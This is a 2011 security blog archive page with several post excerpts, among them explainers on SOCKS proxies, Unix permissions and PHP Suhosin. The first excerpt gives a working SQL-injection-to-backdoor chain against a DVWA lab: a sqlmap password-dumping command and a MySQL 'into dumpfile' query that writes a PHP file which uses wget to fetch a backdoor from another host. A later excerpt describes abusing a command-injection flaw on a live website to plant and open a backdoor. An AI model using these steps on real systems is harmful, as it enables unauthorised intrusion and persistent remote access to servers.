Posts

Showing posts from July, 2011

Create Backdoor From Sql Injection

Image
To create backdoor from sql injection, the web must be vulnerable with sql injection. then we find the password for mysql database, that can be do with some tecnique, like social enginering or scanning with sqlmap, for exemple : root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="Cookie: security=high; PHPSESSID=5c0eecdbcf2a5acdee16c2b389be67e4" --password after we got the password, now we enter to mysql with the following sintax: root@bt:/pentest/database/sqlmap# mysql -h [host ip] -u root -p  then press enter and input the password we got. now we on my sql shell, and from here we can create database and create backdoor. this sample sintax to download backdoor from other web : mysql> select "<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/bad.php' --; Query OK, 1 row affected (0.00 sec) now we ...

sock proxy

SOCKS is an Internet protocol that routes network packets between a client and server through a proxy server. Socks5 additionally provides authentication so only authorized users may access a server. Practically, a SOCKS server will proxy TCP connections to an arbitrary IP address as well as providing a means for UDP packets to be forwarded. Comparison with HTTP Proxying SOCKS operates at a lower level than HTTP proxying: SOCKS uses a handshake protocol to inform the proxy software about the connection that the client is trying to make and may be used for any form of TCP or UDP socket connection, whereas an HTTP proxy takes an HTTP request and forwards it to an HTTP server. Though HTTP proxying has a different use-case in mind, the CONNECT method allows one to forward TCP connections, there is however no mechanism for UDP proxying.

Server Exploit (local exploit)

This time I will write about the exploit servers , the exploit I do over the web is there in , and the web has vulner . I did the following steps :   First , I did a scan of the web to find out what applications are used , and I get the web using wordpress and xampp server applications , since both use the latest version so I do not get vurner . Second , I find that there are vulner used in gadgets , and I found a gadget for the vulner ping an ip , after my tests I found that I can run a variety of commant therein . Third , I wrote commant that serves to download a backdoor that I had prepared . and my backdoor successful entry into the web. F ourth , after a backdoor embedded it is time to find where the location of the embedded backdoor , it's not hard to do because we can use the vulner commant execution had to look for it . after found it, I open the backdoor. until...

Filesystem permissions

Most current file systems have methods of administering permissions or access rights to specific users and groups of users. These systems control the ability of the users affected to view or make changes to the contents of the filesystem. Traditional Unix permissions Permissions on Unix-like systems are managed in three distinct classes . These classes are known as user , group , and others . In effect, Unix permissions are a simplified form of access control lists (ACLs). When a new file is created on a Unix-like system, its permissions are determined from the umask of the process that created it. Classes Files and directories are owned by a user. The owner determines the file's owner class . Distinct permissions apply to the owner. Files and directories are assigned a group, which define the file's group class. Distinct permissions apply to members of the file's group members. The owner doesn't need to be a member of the file's group. Users who are not the...

Building and Exploiting System

In this case i learn to built system and

PHP Suhosin

Suhosin is an advanced protection system for PHP installations. It was designed to protect servers and users from known and unknown flaws in PHP applications and the PHP core. Suhosin comes in two independent parts, that can be used separately or in combination. The first part is a small patch against the PHP core, that implements a few low-level protections against bufferoverflows or format string vulnerabilities and the second part is a powerful PHP extension that implements all the other protections. Suhosin is an open source patch for PHP. "The goal behind Suhosin is to be a safety net that protects servers from insecure PHP coding practices." In some Linux distributions (notably Debian and Ubuntu) it is shipped by default. why is suhosin called suhosin ? According to some blog entries a few korean people are kinda suprised about the name. They wonder why a german developer has choosen a korean word for his project’s name. The reason for this is very simp...